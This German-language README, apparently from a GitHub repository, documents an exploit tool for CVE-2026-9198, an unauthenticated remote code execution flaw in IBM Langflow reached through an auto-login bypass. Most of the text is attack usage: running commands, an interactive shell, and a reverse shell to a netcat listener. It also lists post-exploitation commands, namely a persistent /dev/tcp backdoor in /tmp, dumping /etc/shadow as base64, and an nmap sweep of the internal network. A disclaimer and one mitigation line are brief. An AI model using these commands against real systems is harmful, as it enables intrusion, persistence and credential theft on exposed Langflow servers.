
IBM Langflow: Unauthentifizierte RCE durch Auto-Login-Bypass
CVE-2026-9198 ist eine kritische, nicht authentifizierte Remote-Code-Execution-Schwachstelle (RCE) in IBM Langflow OSS. Dieser Exploit verkettet zwei Schwachstellen:
/api/v1/validate/code, die beliebige Python-Ausführung ermöglicht⚠️ WARNUNG: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Unautorisierte Nutzung ist illegal.
pip-Paketmanagergit clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198
pip install termcolor
Oder installieren Sie alle Abhängigkeiten auf einmal:
pip install -r requirements.txt
python CVE-2026-9198.py --help
Sie sollten das Hilfemenü mit allen verfügbaren Optionen sehen.
Führen Sie einen einzelnen Befehl auf dem Ziel aus:
python CVE-2026-9198.py -t <target_ip> -c "id"
Beispiel:
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"
Starten Sie eine interaktive Shell mit dynamischen Eingabeaufforderungen:
python CVE-2026-9198.py -t <target_ip> --shell
Funktionen:
user@host und das aktuelle Verzeichnis anzeigtcd-Befehlsunterstützung mit automatischer Aktualisierung der EingabeaufforderungBeispielsitzung:
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp
Senden Sie ein Reverse-Shell-Payload an einen Listener:
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>
Beispiel:
# On your machine - Start listener
nc -lvnp 4444
# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444
Wenn Langflow auf einem nicht standardmäßigen Port läuft:
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"
Beispiel:
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"
Überspringen Sie den Auto-Login-Prozess und verwenden Sie ein vorhandenes Token:
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"
Passen Sie den HTTP-Timeout für langsamere Netzwerke an:
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"
Zum Schutz vor dieser Schwachstelle:
/api/v1/auto_login und /api/v1/validate/codeDieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Der Autor ist nicht für Missbrauch oder Schäden verantwortlich, die durch diese Software verursacht werden. Die Benutzer sind allein dafür verantwortlich, die geltenden Gesetze und Vorschriften einzuhalten.
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.
0xgh057r3c0n
Beiträge sind willkommen! Reichen Sie gerne einen Pull Request ein.
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Wenn Sie dieses Tool nützlich finden, geben Sie ihm bitte einen ⭐ auf GitHub!
| Argument | Beschreibung | Erforderlich | Standard |
|---|
-t, --target | Ziel-Host/IP oder vollständige URL | ✅ Ja | - |
-p, --port | Langflow-Port | ❌ Nein | 7860 |
-c, --cmd | Einzelnen Befehl ausführen | ❌ Nein | "id" |
--shell | Interaktiver Pseudo-Shell-Modus | ❌ Nein | False |
--lhost | Reverse-Shell-Listener-IP | ❌ Nein | - |
--lport | Reverse-Shell-Listener-Port | ❌ Nein | 4444 |
-k, --token | Bereitgestelltes Bearer-Token verwenden | ❌ Nein | - |
--timeout | HTTP-Timeout in Sekunden | ❌ Nein | 20 |
--no-banner | Banner ausblenden | ❌ Nein | False |